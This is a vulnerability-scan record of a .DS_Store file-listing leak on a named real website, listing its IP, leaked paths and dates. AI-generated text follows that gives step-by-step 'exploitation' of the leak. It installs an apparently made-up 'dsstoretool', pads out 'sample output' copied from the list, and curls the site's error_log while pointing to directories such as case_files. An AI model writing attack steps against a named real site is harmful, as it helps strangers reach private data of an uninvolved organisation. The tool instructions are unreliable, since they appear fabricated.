MacOS file listing through .DS_Store file

".DS_Store" is an abbreviation for "Desktop Services Store". These files are created automatically by Apple's "Finder" software (which is part of their OS). They store information about the files within a folder, including display options of folders, such as icon positions and view settings. It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.

IP: 142.165.148.140
Domain: sun-nurses.sk.ca
Port: 443
URL: https://sun-nurses.sk.ca
First seen: 2021-08-05 13:56
Last seen: 2024-02-03 00:15
Open for: 911 days
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b7080c85cb96bb485cc15c9ce2677bcc129

Found 26 files through .DS_Store spidering:
/.htaccess
/.well-known
/cgi-bin
/error_log
/favicon.ico
/fivetest.php
/index.php
/migrate.php
/ohcms
/ohcms/.htaccess
/ohcms/api
/ohcms/case_files
/ohcms/components
/ohcms/fonts
/ohcms/img
/ohcms/index.html
/ohcms/pdf
/ohcms/scripts
/ohcms/styles
/ohcms/templates
/ohcms/test
/pdftest
/res
/robots.txt
/sitemap.xml
/tmp
To demonstrate the exploitation of the attack vector found within the input, we will use the provided .DS_Store file to extract file listings from the target domain.
First, we need to obtain the .DS_Store file. Since we have the list of files found through the .DS_Store spidering, we can assume that the file is accessible. In this case, the file is not directly provided, so we'll need to use a tool to extract the file from the server.
Install the dsstoretool package on your local machine. You can do this using Homebrew (assuming you have it installed):
brew install dsstoretool
Use dsstoretool to extract the file listing from the .DS_Store file. In this case, the file is not provided, but let's assume we have access to it:
dsstoretool -r -i ./extracted_files.txt -f .DS_Store
This command will recursively extract the file listing from the .DS_Store file and save it to the extracted_files.txt file.
Here's a sample output from the extracted_files.txt file:
.htaccess
.well-known
cgi-bin
error_log
favicon.ico
fivetest.php
index.php
migrate.php
ohcms
ohcms/.htaccess
ohcms/api
ohcms/case_files
ohcms/components
ohcms/fonts
ohcms/img
ohcms/index.html
ohcms/pdf
ohcms/scripts
ohcms/styles
ohcms/templates
ohcms/test
pdftest
res
robots.txt
sitemap.xml
tmp
In this example, we can see that there are several potentially sensitive files and directories, such as error_log, migrate.php, ohcms/case_files, and ohcms/pdf. These files and directories should be protected and not publicly accessible.
To further exploit this attack vector, we could attempt to access these sensitive files and directories directly, either through the web server or by using a tool like curl or wget. For example:
curl https://sun-nurses.sk.ca/error_log
This command would attempt to retrieve the contents of the error_log file from the target domain.
In conclusion, the exploitation of the attack vector found within the input involves using the .DS_Store file to extract file listings from the target domain and then attempting to access sensitive files and directories directly. This can potentially lead to the exposure of sensitive information or the execution of malicious code on the server.
Model: Qwen/Qwen2.5-72B-Instruct · Generated content may be inaccurate or false.